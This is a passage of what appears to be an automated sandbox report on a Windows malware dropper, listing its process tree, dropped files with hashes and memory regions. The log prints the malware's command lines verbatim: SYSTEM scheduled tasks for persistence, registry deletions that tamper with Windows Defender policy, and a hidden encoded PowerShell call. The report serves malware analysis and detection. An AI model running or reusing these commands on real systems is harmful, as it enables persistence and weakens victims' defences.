                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                              schtasks /DELETE /F /TN "gvpbSUCAb"
                                                                                                              2⤵
                                                                                                                PID:2000
                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                schtasks /CREATE /TN "edBWOMuooExdqrZcA" /SC once /ST 00:27:59 /RU "SYSTEM" /TR "\"C:\Windows\Temp\nfNWSymqMUpUuHcO\LCIJnPBJoTWfDQf\XEnhNKs.exe\" gS /site_id 525403 /S" /V1 /F
                                                                                                                2⤵
                                                                                                                • Drops file in Windows directory
                                                                                                                • Creates scheduled task(s)
                                                                                                                PID:4164
                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                schtasks /run /I /tn "edBWOMuooExdqrZcA"
                                                                                                                2⤵
                                                                                                                  PID:708
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                1⤵
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:3848
                                                                                                                • C:\Windows\system32\gpupdate.exe
                                                                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                  2⤵
                                                                                                                    PID:3928
                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                  1⤵
                                                                                                                    PID:4344
                                                                                                                  • C:\Windows\system32\gpscript.exe
                                                                                                                    gpscript.exe /RefreshSystemParam
                                                                                                                    1⤵
                                                                                                                      PID:4640
                                                                                                                    • C:\Windows\Temp\nfNWSymqMUpUuHcO\LCIJnPBJoTWfDQf\XEnhNKs.exe
                                                                                                                      C:\Windows\Temp\nfNWSymqMUpUuHcO\LCIJnPBJoTWfDQf\XEnhNKs.exe gS /site_id 525403 /S
                                                                                                                      1⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Checks computer location settings
                                                                                                                      • Drops Chrome extension
                                                                                                                      • Drops desktop.ini file(s)
                                                                                                                      • Drops file in System32 directory
                                                                                                                      • Drops file in Program Files directory
                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      PID:4216
                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                        schtasks /DELETE /F /TN "bCyvnyfpqmszJThflt"
                                                                                                                        2⤵
                                                                                                                          PID:1308
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                          2⤵
                                                                                                                            PID:4088
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                              3⤵
                                                                                                                                PID:392
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                              2⤵
                                                                                                                                PID:2088
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                  3⤵
                                                                                                                                    PID:4948
                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\dcfUmdSjU\xdXcCP.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ZyjDcemhWnZiRjZ" /V1 /F
                                                                                                                                  2⤵
                                                                                                                                  • Drops file in Windows directory
                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                  PID:4848
                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                  schtasks /CREATE /TN "ZyjDcemhWnZiRjZ2" /F /xml "C:\Program Files (x86)\dcfUmdSjU\KUVDaWp.xml" /RU "SYSTEM"
                                                                                                                                  2⤵
                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                  PID:4608
                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                  schtasks /END /TN "ZyjDcemhWnZiRjZ"
                                                                                                                                  2⤵
                                                                                                                                    PID:3552
                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                    schtasks /DELETE /F /TN "ZyjDcemhWnZiRjZ"
                                                                                                                                    2⤵
                                                                                                                                      PID:4424
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /CREATE /TN "uWNZfQETrUQFrW" /F /xml "C:\Program Files (x86)\XQsbGbUnGtzU2\oFuGjzH.xml" /RU "SYSTEM"
                                                                                                                                      2⤵
                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                      PID:2300
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /CREATE /TN "TtPvJAYYoFIYL2" /F /xml "C:\ProgramData\rJEhQdXgeMRvrNVB\ehypOhA.xml" /RU "SYSTEM"
                                                                                                                                      2⤵
                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                      PID:1116
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /CREATE /TN "RAyhtxYCZQuqnPOcr2" /F /xml "C:\Program Files (x86)\wsiZiWSgtetGEIvxlHR\YScztSZ.xml" /RU "SYSTEM"
                                                                                                                                      2⤵
                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                      PID:3188
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /CREATE /TN "UjvCTOUcOaIEXUTAhGF2" /F /xml "C:\Program Files (x86)\ePXawUxxZnGOC\jlvLXzx.xml" /RU "SYSTEM"
                                                                                                                                      2⤵
                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                      PID:4616
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /CREATE /TN "ZwcXYpQRkXweEeupt" /SC once /ST 02:34:40 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\nfNWSymqMUpUuHcO\tbAAQxva\XarsbJX.dll\",#1 /site_id 525403" /V1 /F
                                                                                                                                      2⤵
                                                                                                                                      • Drops file in Windows directory
                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                      PID:3268
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /run /I /tn "ZwcXYpQRkXweEeupt"
                                                                                                                                      2⤵
                                                                                                                                        PID:2564
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                        2⤵
                                                                                                                                          PID:2596
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                            3⤵
                                                                                                                                              PID:4760
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                            2⤵
                                                                                                                                              PID:956
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                                3⤵
                                                                                                                                                  PID:660
                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                schtasks /DELETE /F /TN "edBWOMuooExdqrZcA"
                                                                                                                                                2⤵
                                                                                                                                                  PID:3304
                                                                                                                                              • C:\Windows\system32\rundll32.EXE
                                                                                                                                                C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\nfNWSymqMUpUuHcO\tbAAQxva\XarsbJX.dll",#1 /site_id 525403
                                                                                                                                                1⤵
                                                                                                                                                  PID:2308
                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\nfNWSymqMUpUuHcO\tbAAQxva\XarsbJX.dll",#1 /site_id 525403
                                                                                                                                                    2⤵
                                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                    PID:4260
                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                      schtasks /DELETE /F /TN "ZwcXYpQRkXweEeupt"
                                                                                                                                                      3⤵
                                                                                                                                                        PID:2248

                                                                                                                                                  Network

                                                                                                                                                  MITRE ATT&CK Enterprise v6

                                                                                                                                                  Replay Monitor

                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                  Downloads

                                                                                                                                                  • C:\Program Files (x86)\XQsbGbUnGtzU2\oFuGjzH.xml

                                                                                                                                                    Filesize

                                                                                                                                                    2KB

                                                                                                                                                    MD5

                                                                                                                                                    2dae0f2252d6f45da2edacbee274c305

                                                                                                                                                    SHA1

                                                                                                                                                    a2702363c09eae1156df1c355953075bdb6ce369

                                                                                                                                                    SHA256

                                                                                                                                                    4e308943f1b9c96cdb93d4e21acf867f1b45f5f8802e545d0df87764f2ffdf48

                                                                                                                                                    SHA512

                                                                                                                                                    492681fc74a28ba99608cc9df36dd7900521726ca2d5cf57d52b02e881ad26d76e66ed41283f07fa4fcd7cb4095fee6cd3a2e666309218e2810b4923bca8d8d6

                                                                                                                                                  • C:\Program Files (x86)\dcfUmdSjU\KUVDaWp.xml

                                                                                                                                                    Filesize

                                                                                                                                                    2KB

                                                                                                                                                    MD5

                                                                                                                                                    63666432f5818c088f35f7cca2ad3592

                                                                                                                                                    SHA1

                                                                                                                                                    a69e5844456bb06a645ce432b2fdac1ef37f0922

                                                                                                                                                    SHA256

                                                                                                                                                    1075aa7c6e6e256872788e362209bd6b021755e0d3a96cd98a3671a637639e68

                                                                                                                                                    SHA512

                                                                                                                                                    231d798b4d70b6ca471e8b1c198f27e5c1c29234a742cb68188318f3c526d36c9734d99c34bd16d58d0dc51a00d74ec59a02a1959a68e2572e802f2ab1004050

                                                                                                                                                  • C:\Program Files (x86)\ePXawUxxZnGOC\jlvLXzx.xml

                                                                                                                                                    Filesize

                                                                                                                                                    2KB

                                                                                                                                                    MD5

                                                                                                                                                    5f9b174d37533282d622a04f4657592b

                                                                                                                                                    SHA1

                                                                                                                                                    fcc81593830af77115d325f754efaf2e5af244b3

                                                                                                                                                    SHA256

                                                                                                                                                    0d1e8c4eeb66897b2d0b4e7ac82301ecd304643f77f0278816085cd20d95d871

                                                                                                                                                    SHA512

                                                                                                                                                    39d6288b1f45a8ce5ccf7997a8c25708807b898ad14b6fa812688fd763bf1c43306c6b6826460932f8dc1410d327d0d04fdb8bf04eb9cc001a816f97308709e5

                                                                                                                                                  • C:\Program Files (x86)\wsiZiWSgtetGEIvxlHR\YScztSZ.xml

                                                                                                                                                    Filesize

                                                                                                                                                    2KB

                                                                                                                                                    MD5

                                                                                                                                                    d4f2437f036281b258dd43bf95e71905

                                                                                                                                                    SHA1

                                                                                                                                                    29fa1f81ce2df00948304de054da4344c0fcc2f7

                                                                                                                                                    SHA256

                                                                                                                                                    6803d9dccd44cb45fe5c5b39e9f219e54e36dd3d4b705b2c2e1a140cea8bad89

                                                                                                                                                    SHA512

                                                                                                                                                    20571b778fba0192bc55a0ebfedc8630943a4c9898cce11c281af65ec06cf8f9c65d6d33e87b56acf1374e523461fe8b08f910a5e8500369c503225723a2750a

                                                                                                                                                  • C:\ProgramData\rJEhQdXgeMRvrNVB\ehypOhA.xml

                                                                                                                                                    Filesize

                                                                                                                                                    2KB

                                                                                                                                                    MD5

                                                                                                                                                    2fe25fe7d75e1bd14f7b0c80d3a24362

                                                                                                                                                    SHA1

                                                                                                                                                    b3bd8a8331228475c500d6de6fa1b20bc56be498

                                                                                                                                                    SHA256

                                                                                                                                                    75e1642844817fc415781955969a78252ef1084e4358800d57f4326a1b1ee641

                                                                                                                                                    SHA512

                                                                                                                                                    cfbba283d72683a7947ce3de47e251c8539db31cca8c5ed971e49c48813fde3532ae71afe06b1f6a25b132c6cc63846a7b8440ee3d7fe6a9075812c7e54cfc1d

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

                                                                                                                                                    Filesize

                                                                                                                                                    2KB

                                                                                                                                                    MD5

                                                                                                                                                    6cf293cb4d80be23433eecf74ddb5503

                                                                                                                                                    SHA1

                                                                                                                                                    24fe4752df102c2ef492954d6b046cb5512ad408

                                                                                                                                                    SHA256

                                                                                                                                                    b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

                                                                                                                                                    SHA512

                                                                                                                                                    0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                    Filesize

                                                                                                                                                    64B

                                                                                                                                                    MD5

                                                                                                                                                    5caad758326454b5788ec35315c4c304

                                                                                                                                                    SHA1

                                                                                                                                                    3aef8dba8042662a7fcf97e51047dc636b4d4724

                                                                                                                                                    SHA256

                                                                                                                                                    83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

                                                                                                                                                    SHA512

                                                                                                                                                    4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS8D22.tmp\Install.exe

                                                                                                                                                    Filesize

                                                                                                                                                    6.3MB

                                                                                                                                                    MD5

                                                                                                                                                    0dd3e76103ad235fe1c78e89da180448

                                                                                                                                                    SHA1

                                                                                                                                                    bda1708ac61fb5112ea30f37f5b6d3f3bd8bd9d3

                                                                                                                                                    SHA256

                                                                                                                                                    7e21c8e4e6a08ab1f0cf4e6f05a540c94374b64aa34333a38abc6aeb36e784bf

                                                                                                                                                    SHA512

                                                                                                                                                    3a55d35ea2caf8e1152d3e2d83efb3a293975655bff73b10afe78b95f9ea1022d0039a7f690c9e9405e9af120d4f1537936dce25243be7bdf49bcc3f02c4ccd5

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS8D22.tmp\Install.exe

                                                                                                                                                    Filesize

                                                                                                                                                    6.3MB

                                                                                                                                                    MD5

                                                                                                                                                    0dd3e76103ad235fe1c78e89da180448

                                                                                                                                                    SHA1

                                                                                                                                                    bda1708ac61fb5112ea30f37f5b6d3f3bd8bd9d3

                                                                                                                                                    SHA256

                                                                                                                                                    7e21c8e4e6a08ab1f0cf4e6f05a540c94374b64aa34333a38abc6aeb36e784bf

                                                                                                                                                    SHA512

                                                                                                                                                    3a55d35ea2caf8e1152d3e2d83efb3a293975655bff73b10afe78b95f9ea1022d0039a7f690c9e9405e9af120d4f1537936dce25243be7bdf49bcc3f02c4ccd5

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS8FD1.tmp\Install.exe

                                                                                                                                                    Filesize

                                                                                                                                                    6.8MB

                                                                                                                                                    MD5

                                                                                                                                                    6ed5ceea1b2666d3aec3770d0e43263b

                                                                                                                                                    SHA1

                                                                                                                                                    240689ae503b0a5d8910369c07a496a67edaf268

                                                                                                                                                    SHA256

                                                                                                                                                    7f059f1e38aa3b5ff0fbc1841a7c5a98887d2e490dc6e7392a59e4caae468521

                                                                                                                                                    SHA512

                                                                                                                                                    139288ae05778c5631071399fe81bcbb87d82808630f3a95cca49add3350ba782f465fbc3eb30516fdbe7102b99602e4bb7cb0b92e4dab1ae1792ac09b2eebb0

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS8FD1.tmp\Install.exe

                                                                                                                                                    Filesize

                                                                                                                                                    6.8MB

                                                                                                                                                    MD5

                                                                                                                                                    6ed5ceea1b2666d3aec3770d0e43263b

                                                                                                                                                    SHA1

                                                                                                                                                    240689ae503b0a5d8910369c07a496a67edaf268

                                                                                                                                                    SHA256

                                                                                                                                                    7f059f1e38aa3b5ff0fbc1841a7c5a98887d2e490dc6e7392a59e4caae468521

                                                                                                                                                    SHA512

                                                                                                                                                    139288ae05778c5631071399fe81bcbb87d82808630f3a95cca49add3350ba782f465fbc3eb30516fdbe7102b99602e4bb7cb0b92e4dab1ae1792ac09b2eebb0

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\qeWngPqsDKCKdDfMS\dmkJKBLNxjoaHKN\raSOoHc.exe

                                                                                                                                                    Filesize

                                                                                                                                                    6.8MB

                                                                                                                                                    MD5

                                                                                                                                                    6ed5ceea1b2666d3aec3770d0e43263b

                                                                                                                                                    SHA1

                                                                                                                                                    240689ae503b0a5d8910369c07a496a67edaf268

                                                                                                                                                    SHA256

                                                                                                                                                    7f059f1e38aa3b5ff0fbc1841a7c5a98887d2e490dc6e7392a59e4caae468521

                                                                                                                                                    SHA512

                                                                                                                                                    139288ae05778c5631071399fe81bcbb87d82808630f3a95cca49add3350ba782f465fbc3eb30516fdbe7102b99602e4bb7cb0b92e4dab1ae1792ac09b2eebb0

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\qeWngPqsDKCKdDfMS\dmkJKBLNxjoaHKN\raSOoHc.exe

                                                                                                                                                    Filesize

                                                                                                                                                    6.8MB

                                                                                                                                                    MD5

                                                                                                                                                    6ed5ceea1b2666d3aec3770d0e43263b

                                                                                                                                                    SHA1

                                                                                                                                                    240689ae503b0a5d8910369c07a496a67edaf268

                                                                                                                                                    SHA256

                                                                                                                                                    7f059f1e38aa3b5ff0fbc1841a7c5a98887d2e490dc6e7392a59e4caae468521

                                                                                                                                                    SHA512

                                                                                                                                                    139288ae05778c5631071399fe81bcbb87d82808630f3a95cca49add3350ba782f465fbc3eb30516fdbe7102b99602e4bb7cb0b92e4dab1ae1792ac09b2eebb0

                                                                                                                                                  • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                                                                    Filesize

                                                                                                                                                    1KB

                                                                                                                                                    MD5

                                                                                                                                                    33b19d75aa77114216dbc23f43b195e3

                                                                                                                                                    SHA1

                                                                                                                                                    36a6c3975e619e0c5232aa4f5b7dc1fec9525535

                                                                                                                                                    SHA256

                                                                                                                                                    b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2

                                                                                                                                                    SHA512

                                                                                                                                                    676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

                                                                                                                                                  • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                    Filesize

                                                                                                                                                    11KB

                                                                                                                                                    MD5

                                                                                                                                                    909b241d02b661db3c1d0d77f308badd

                                                                                                                                                    SHA1

                                                                                                                                                    b773902798302ea36761f86c60e469f4ada8a9b5

                                                                                                                                                    SHA256

                                                                                                                                                    d29338d00def93b005e3bef298068ac8808143accfaf39f34ae567ae66af286b

                                                                                                                                                    SHA512

                                                                                                                                                    447c7f5593ff6563600e436711f89e8efe70f1ff0f4d36b5a1307dcd544fbc84a628097bf82d8364ac03a3c736c57f725287619d46d3a327765bad20167667cb

                                                                                                                                                  • C:\Windows\Temp\nfNWSymqMUpUuHcO\LCIJnPBJoTWfDQf\XEnhNKs.exe

                                                                                                                                                    Filesize

                                                                                                                                                    6.8MB

                                                                                                                                                    MD5

                                                                                                                                                    6ed5ceea1b2666d3aec3770d0e43263b

                                                                                                                                                    SHA1

                                                                                                                                                    240689ae503b0a5d8910369c07a496a67edaf268

                                                                                                                                                    SHA256

                                                                                                                                                    7f059f1e38aa3b5ff0fbc1841a7c5a98887d2e490dc6e7392a59e4caae468521

                                                                                                                                                    SHA512

                                                                                                                                                    139288ae05778c5631071399fe81bcbb87d82808630f3a95cca49add3350ba782f465fbc3eb30516fdbe7102b99602e4bb7cb0b92e4dab1ae1792ac09b2eebb0

                                                                                                                                                  • C:\Windows\Temp\nfNWSymqMUpUuHcO\LCIJnPBJoTWfDQf\XEnhNKs.exe

                                                                                                                                                    Filesize

                                                                                                                                                    6.8MB

                                                                                                                                                    MD5

                                                                                                                                                    6ed5ceea1b2666d3aec3770d0e43263b

                                                                                                                                                    SHA1

                                                                                                                                                    240689ae503b0a5d8910369c07a496a67edaf268

                                                                                                                                                    SHA256

                                                                                                                                                    7f059f1e38aa3b5ff0fbc1841a7c5a98887d2e490dc6e7392a59e4caae468521

                                                                                                                                                    SHA512

                                                                                                                                                    139288ae05778c5631071399fe81bcbb87d82808630f3a95cca49add3350ba782f465fbc3eb30516fdbe7102b99602e4bb7cb0b92e4dab1ae1792ac09b2eebb0

                                                                                                                                                  • C:\Windows\Temp\nfNWSymqMUpUuHcO\tbAAQxva\XarsbJX.dll

                                                                                                                                                    Filesize

                                                                                                                                                    6.2MB

                                                                                                                                                    MD5

                                                                                                                                                    767120cd3c79c14d4e412a94ab96e772

                                                                                                                                                    SHA1

                                                                                                                                                    634ff2b4dfb9f3597be79de8b81903464da9695e

                                                                                                                                                    SHA256

                                                                                                                                                    94274687ee2886481cfeb3d814295510aafe5234d3a60aad9de97b41e328d50b

                                                                                                                                                    SHA512

                                                                                                                                                    a92171ccb90de1c9a6205319b837d555b5204137b334913da1972385614c57035caf1754ee045833e3faf090891e46cc1d87c24e1435e43b2d25bff5086a5a84

                                                                                                                                                  • C:\Windows\Temp\nfNWSymqMUpUuHcO\tbAAQxva\XarsbJX.dll

                                                                                                                                                    Filesize

                                                                                                                                                    6.2MB

                                                                                                                                                    MD5

                                                                                                                                                    767120cd3c79c14d4e412a94ab96e772

                                                                                                                                                    SHA1

                                                                                                                                                    634ff2b4dfb9f3597be79de8b81903464da9695e

                                                                                                                                                    SHA256

                                                                                                                                                    94274687ee2886481cfeb3d814295510aafe5234d3a60aad9de97b41e328d50b

                                                                                                                                                    SHA512

                                                                                                                                                    a92171ccb90de1c9a6205319b837d555b5204137b334913da1972385614c57035caf1754ee045833e3faf090891e46cc1d87c24e1435e43b2d25bff5086a5a84

                                                                                                                                                  • C:\Windows\system32\GroupPolicy\Machine\Registry.pol

                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                    MD5

                                                                                                                                                    f8138a6da2551fdcc42f1c3d5823b1ea

                                                                                                                                                    SHA1

                                                                                                                                                    3178a7723b47c00174a5a5b0a22929c6fff7f13d

                                                                                                                                                    SHA256

                                                                                                                                                    013f3653c3ba675599c890d6e522f78dca64976fca5247293d9ba60ed4f5ac71

                                                                                                                                                    SHA512

                                                                                                                                                    bad1622b15e3ce2b6162ca8257ef23bfd84e9c0e8d322f2eaff07a2e70445423242caf75465cc84504ce821869f3590d6dcd2bd26555fd480099a653cd617512

                                                                                                                                                  • C:\Windows\system32\GroupPolicy\gpt.ini

                                                                                                                                                    Filesize

                                                                                                                                                    268B

                                                                                                                                                    MD5

                                                                                                                                                    a62ce44a33f1c05fc2d340ea0ca118a4

                                                                                                                                                    SHA1

                                                                                                                                                    1f03eb4716015528f3de7f7674532c1345b2717d

                                                                                                                                                    SHA256

                                                                                                                                                    9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a

                                                                                                                                                    SHA512

                                                                                                                                                    9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

                                                                                                                                                  • memory/220-179-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/348-188-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/392-143-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/392-183-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/620-211-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/628-177-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/708-173-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/852-215-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/1116-153-0x00007FFCF8D70000-0x00007FFCF9831000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    10.8MB

                                                                                                                                                  • memory/1116-151-0x00000123FB4A0000-0x00000123FB4C2000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    136KB

                                                                                                                                                  • memory/1284-150-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/1308-178-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/1432-212-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/1440-135-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/1440-138-0x0000000010000000-0x00000000109A4000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    9.6MB

                                                                                                                                                  • memory/1460-175-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/1476-207-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/1700-180-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/1716-155-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/1764-196-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/1832-198-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/1844-158-0x0000000010000000-0x00000000109A4000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    9.6MB

                                                                                                                                                  • memory/1992-146-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/2000-220-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/2052-142-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/2092-208-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/2112-168-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/2120-172-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/2160-182-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/2264-201-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/2304-197-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/2316-174-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/2408-184-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/2424-193-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/2520-176-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/2564-210-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/2708-189-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/2736-190-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/3088-192-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/3096-149-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/3336-186-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/3336-141-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/3400-200-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/3412-199-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/3496-145-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/3716-191-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/3776-152-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/3848-219-0x00007FFCF8C50000-0x00007FFCF9711000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    10.8MB

                                                                                                                                                  • memory/3864-170-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/3928-218-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/3964-169-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/4040-132-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/4088-147-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/4164-221-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/4216-227-0x0000000003E00000-0x0000000003E85000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    532KB

                                                                                                                                                  • memory/4216-241-0x0000000004DC0000-0x0000000004E38000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    480KB

                                                                                                                                                  • memory/4216-231-0x0000000004450000-0x00000000044B8000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    416KB

                                                                                                                                                  • memory/4216-245-0x0000000004FC0000-0x0000000005079000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    740KB

                                                                                                                                                  • memory/4260-248-0x0000000001B10000-0x00000000024B4000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    9.6MB

                                                                                                                                                  • memory/4280-185-0x0000000000000000-mapping.dmp

